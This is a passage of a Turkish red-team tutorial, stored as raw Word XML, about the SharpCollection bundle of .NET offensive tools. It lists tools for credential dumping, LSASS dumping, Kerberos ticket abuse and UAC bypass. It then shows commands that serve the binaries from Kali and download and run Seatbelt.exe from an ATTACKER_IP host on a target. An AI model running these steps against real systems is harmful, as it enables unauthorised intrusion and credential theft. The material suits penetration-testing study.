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DA5AE" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpCollection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909EDEF" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpCollection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve">, birden fazla popüler .NET tabanlı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>Red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> Team aracını tek bir yerde toplayan bir </w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>araç paketidir</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9CF0D" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>GitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> deposu:</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="003003B6">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://github.com/Flangvik/SharpCollection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46890EC6" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:r w:rsidRPr="003003B6">
        <w:t>Bu koleksiyon sayesinde aşağıdaki işlemler kolayca yapılabilir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13088EE2" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>Credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>dumping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A5E3C7B" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve">Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>reconnaissance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C43265C" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>Pass-the-hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57234B92" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003003B6">
        <w:t>UAC bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9E27B" w14:textId="0165D490" w:rsidR="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003003B6">
        <w:t>Post-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:t>exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41CE0A85" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Kurulum &amp; Kullanım (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux üzerinden hedefe gönderme)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187676F9" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Depoyu klonla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E210D" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">git </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>clone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> https://github.com/Flangvik/SharpCollection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426ED74" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload’ları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hedefe aktarmak için:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1BC8B" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>SharpCollection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>NetFramework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="400AC703" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7881967E" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t>Hedef Windows sistemde:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18261D89" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>Uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> http://ATTACKER_IP/Seatbelt.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> Seatbelt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947CEE4" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t>.\Seatbelt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFFBE1" w14:textId="2866318F" w:rsidR="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">Tüm araçlar taşınabilir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>EXE’ler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> şeklindedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5E0B2" w14:textId="6E6EF061" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B5AED82" wp14:editId="09F74717">
            <wp:extent cx="5754869" cy="2292928"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1225821502" name="Resim 1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21502" name="Resim 1" descr="metin, ekran görüntüsü, yazı tipi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255" cy="233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6358E" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6"/>
    <w:p w14:paraId="3DA233EB" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. İçerisindeki Öne Çıkan Araçla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4161"/>
      </w:tblGrid>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="61F924B3" w14:textId="77777777" w:rsidTr="003003B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AE9E73" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003003B6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Araç Adı</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50016E81" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003003B6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Görev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="1513931E" w14:textId="77777777" w:rsidTr="00300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01DF10" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpHou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D74234" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t>Active Directory keşfi (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>BloodHound</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> için)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="2C7DDDD3" w14:textId="77777777" w:rsidTr="00300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FFB1A7" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Rube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4F1FA6" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Kerberos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>ticket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> işlemleri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="214C20A5" w14:textId="77777777" w:rsidTr="00300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B3BC2B" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Seatbel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46B9A0" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t>Sistem bilgisi toplama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="6D72607F" w14:textId="77777777" w:rsidTr="00300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8D148A" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpU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59A742" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Privilege</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>escalation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> zafiyet analizi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="058E1273" w14:textId="77777777" w:rsidTr="00300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ECE56A" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpDPAP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2A0852" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve">DPAPI üzerinden </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>credential</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> çıkarma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="38DCC032" w14:textId="77777777" w:rsidTr="00300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668564" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpDum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182F56" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve">LSASS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="372A4906" w14:textId="77777777" w:rsidTr="00300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C622B9" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SafetyKat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2EBD8A" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003003B6">
              <w:t xml:space="preserve"> uyarlaması (.NET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="0C2E49B4" w14:textId="77777777" w:rsidTr="00300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40489D" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>Certif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2E9C47" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t>Sertifika zafiyet analizi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="7DFD1C6F" w14:textId="77777777" w:rsidTr="00300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CE463F" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpWM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69C026" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t>WMI ile uzaktan komut çalıştırma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003003B6" w:rsidRPr="003003B6" w14:paraId="266A3E28" w14:textId="77777777" w:rsidTr="00300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38DC16" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003003B6">
              <w:t>SharpBypassUA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602B4F" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
            <w:r w:rsidRPr="003003B6">
              <w:t>UAC atlatma işlemleri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54DF50CF" w14:textId="77777777" w:rsidR="003003B6" w:rsidRPr="003003B6" w:rsidRDefault="003003B6" w:rsidP="003003B6">
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve">Hepsi ayrı ayrı çalıştırılabilir. Birçoğu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fileless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> veya </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>obfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003003B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> edilmiş</w:t>
      </w:r>
      <w:r w:rsidRPr="003003B6">
        <w:t xml:space="preserve"> şekilde kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128495FD" w14:textId="1756C899" w:rsidR="002E41E1" w:rsidRDefault="002E41E1"/>
    <w:p w14:paraId="5C898371" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRDefault="002E41E1"/>
    <w:p w14:paraId="5D73AA46" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Örnek Kullanım Komutları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39581A65" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistem bilgisi toplamak için </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Seatbelt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB54FE" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t>Seatbelt.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09F85192" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎫</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
